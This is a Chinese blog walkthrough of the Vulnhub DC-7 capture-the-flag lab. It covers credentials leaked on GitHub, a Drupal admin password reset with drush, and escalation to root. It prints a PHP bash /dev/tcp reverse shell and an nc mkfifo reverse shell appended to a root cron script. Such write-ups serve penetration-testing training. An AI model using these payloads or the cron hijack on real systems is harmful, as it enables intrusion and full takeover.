【Vulnhub】DC-7

最新推荐文章于 2025-12-22 19:02:22 发布
原创 最新推荐文章于 2025-12-22 19:02:22 发布 · 123 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #linux

信息收集

只开了两个端口22,80
先访问网站
在这里插入图片描述
还有一些提示,说明暴力破解不会成功
在这里插入图片描述
先扫目录,在找找中间件和框架有没有漏洞
多是多但是都用不了
在这里插入图片描述
目录里面也没什么敏感信息,还是看看别人的wp

DC-7引入了一些“新”概念,但我将留给你们去弄清楚它们是什么。:-)
虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。
你要做的是跳出框框思考。在盒子外面。:-)
在左下角发现了一个 @DC7USER 处于好奇心 我们百度一下看看 果然第一个就是 GitHub项目 先把他下载下来
在这里插入图片描述
通过代码审计我们可以看到数据库的账号和密码:dc7user,MdR3xOgB7#dW 可以使用ssh登入!!
————————————————
版权声明:本文为优快云博主「落寞的魚丶」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.youkuaiyun.com/Aluxian_/article/details/123827661

…真有人把自己的账号密码都开源上去了
在这里插入图片描述
看着是sql密码,说不定别的也可以用,网站和ssh试试
在这里插入图片描述
在这里插入图片描述
上去了,/backups下就哪个.gpg格式不知道干啥的别的都没用,mbox像是root执行的信息
在这里插入图片描述
有个邮件看看
就是以一个自动记录脚本记录的dcuser7操作
在这里插入图片描述
陌生的命令,搜一搜:管理drupal的
在这里插入图片描述

$ drush cr 各种清缓存
$ drush pm-enable 安装module
$ drush pm-uninstall 卸载module
$ drush pm-list 显示所有modules and themes列表
$ drush user-password admin --password=“admin” 更改密码
————————————————
版权声明:本文为优快云博主「苏洛荨」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.youkuaiyun.com/qq_15936309/article/details/86590353、

错误大概意思就是需要在drupal里运行,cd到网站目录下

在这里插入图片描述

drush user-password admin --password="admin"

提权

实在不会,找的那个exp压根烂透了,一执行就乱报

拿到后台以后就可以考虑怎么进一步提升我们的权限了,按照惯例我们可以通过反弹shell的方式,一般是改文章,通过文章解析成代码,这里行不通,因为在 Drupal8中删除了这个解析的模块,那就只能找别的方式了
把这个模块再下载回来
地址https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
在这里插入图片描述
写入php脚本,反弹

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.100.134/10086 0>&1'");  //反弹脚本
?>

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.0.103 7777 >/tmp/f" >> backups.sh
backups.sh是一个定时文件,root执行,所以反弹出来的权限也是root权限

等待定时任务执行,反弹权限。

Vulnhub DC-7
Pai_Space
03-26 5619
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
Vulnhub打靶-DC-1
jnszstmei的博客
10-25 1055
框架漏洞的发现和利用以及利用cms的特性进行管理员密码的更改,实现对靶机的渗透并获取root权限
VulnHub DC-1
烟敛寒林的博客
09-05 604
靶机配置及说明 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/靶机:DC1 (VirtualBox) IP:192.168.10.103攻击机:Kali(VMware ) IP:192.168.10.104说明:DC1需要找到5个flag,最终目标是在root的主目录中找到并读取该flag 关于每个flag的知识点 1、msf的熟练使用以及搜索可利用漏洞(Drupal)2、留意目标网站的配置文件(more慢慢查看别错过重要信息...
Vulnhub - DC-1
qq_46081990的博客
03-14 562
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub DC-7靶机实战
m0_51195235的博客
11-21 231
vulnhub DC-7靶机实战
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2458
vulnhub DC-4靶机实战
vulnhub DC-2靶机实战
m0_51195235的博客
10-04 171
vulnhub DC-2靶机实战
Vulnhub DC-8
Pai_Space
04-05 1098
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 531
DC-1详解
vulnhub DC-7 靶机 渗透测试
小松博客
05-28 226
我们打开这个人的界面,发现一个在GitHub上的神秘链接。映入眼帘的就是一个config.php,并且拿到了数据库的账号密码。这个drush 原来是dupal 的命令,具体可以参考这个链接内容。我们查看一下这个backups.sh文件,这个命令很奇怪。执行ls,发现有一个backup文件夹和mbox文件。跳出框框思考,我们在网页下面发现一个神秘代码。拿到shell,查看自己有哪些权限。发现没有php模块,我们自己加一个。等了好几分钟,shell终于到了。端口发现,开放80,22。登陆,进入后台模块管理。
Vulnhub DC-8靶机攻击实战(一)
初学者
01-16 1397
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新一期关于Vulnhub DC-8的打靶训练,如下所示。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8850
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux中的cd ~命令
tuokuac的博客
12-19 317
本文详细解析了Linux中的cd ~命令,从四个维度帮助用户掌握这一常用操作。核心功能是快速切换至当前用户的家目录,~符号会自动解析为对应路径。文章介绍了完全等价的命令(如单独使用cd或cd $HOME),并拓展了结合子目录和其他用户家目录的用法。特别提醒注意~与-的区别、权限问题及~的符号性质。总结强调该命令是日常操作中最便捷的目录切换方式,能避免手动输入长路径。全文以通俗示例和对比说明,帮助用户彻底理解这一基础但高频使用的命令。
Linux SSH配置密钥文件及免密登录
Tongyao
12-18 163
本文介绍了配置SSH免密登录的详细步骤:1)使用ssh-keygen生成RSA密钥对;2)将公钥加入authorized_keys文件;3)在A机器上传B机器私钥至.ssh目录;4)设置密钥权限为600;5)配置~/.ssh/config文件指定主机、用户和密钥路径;6)通过简化命令实现免密登录。整个过程强调了密钥权限设置的重要性,并提供了完整的配置示例。
Linux线上服务器掉电后无法启动故障的分析与修复实践——及其隐患解决(标准分区扩容、逻辑分区缩容与扩容)
CoffeMilk的博客
12-19 217
Linux服务器掉电后无法启动,错误显示根分区空间已满。通过系统救援模式分析,发现15G的swapfile文件占用过多空间。解决方案包括:1)以只读模式进入救援系统,修改为读写模式后删除大文件;2)通过LVM管理调整分区,将/home空间重新分配给根分区。文章详细介绍了标准分区和逻辑卷的扩容缩容操作步骤,包括卸载分区、调整大小、重新挂载等关键命令。同时指出系统分区设计不合理是根本原因,建议将/var和/log独立分区以避免未来再次出现空间不足问题。
Linux】内网穿透(实操)/打洞
2401_83251330的博客
12-20 1644
我这里没有记录",于是,直接将该报文丢弃了,这就是防火墙策略。现在B可以直接去找A:B到A小区保安处说“我找54321号保安亭的A”,保安查登记簿发现8765号保安亭的B在允许名单里,于是放行。利用一台具有公网IP的服务器作为“桥梁”或“中继站”,通过由内网设备主动发起的、持续的连接,在公网与内网之间建立一条虚拟的数据隧道,从而绕过NAT/防火墙的限制。最后,如何验证你的云服务器上的端口是否是可达的,可以被公网访问的,我们可以在cmd使用telnet,如果没有telnet,可以在powershell执行。
Linux 进程控制
最新发布
2401_87277188的博客
12-22 487
本章重点①:学习进程的创建,fork/vfork②:学习进程终止,认识$③:学习进程等待④:写一个微型的shell(单独列一章),重新认识shell运行原理。
MobaXterm 高效运维实战:从入门到进阶的 Linux 运维 “瑞士军刀” 用法
hy行者勇哥的博客
12-18 894
MobaXterm 作为 Linux 运维的 “全能工具包”,不仅集成了 SSH 终端、SFTP 文件传输、X11 图形转发等基础功能,更隐藏着批量执行、宏命令、会话分组等高级特性,能轻松解决新手常遇到的 “重复操作繁琐”“多服务器切换麻烦”“文件传输低效” 等痛点。本文用 “运维指挥中心” 的通俗比喻,拆解 MobaXterm 的核心架构,针对 Linux 运维中的高频问题,分享可直接上手的高级技巧与自动化脚本案例,帮助新手快速从 “手动跑腿” 升级为 “高效指挥”,大幅提升运维效率。
vulnhub dc-4
03-23
### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值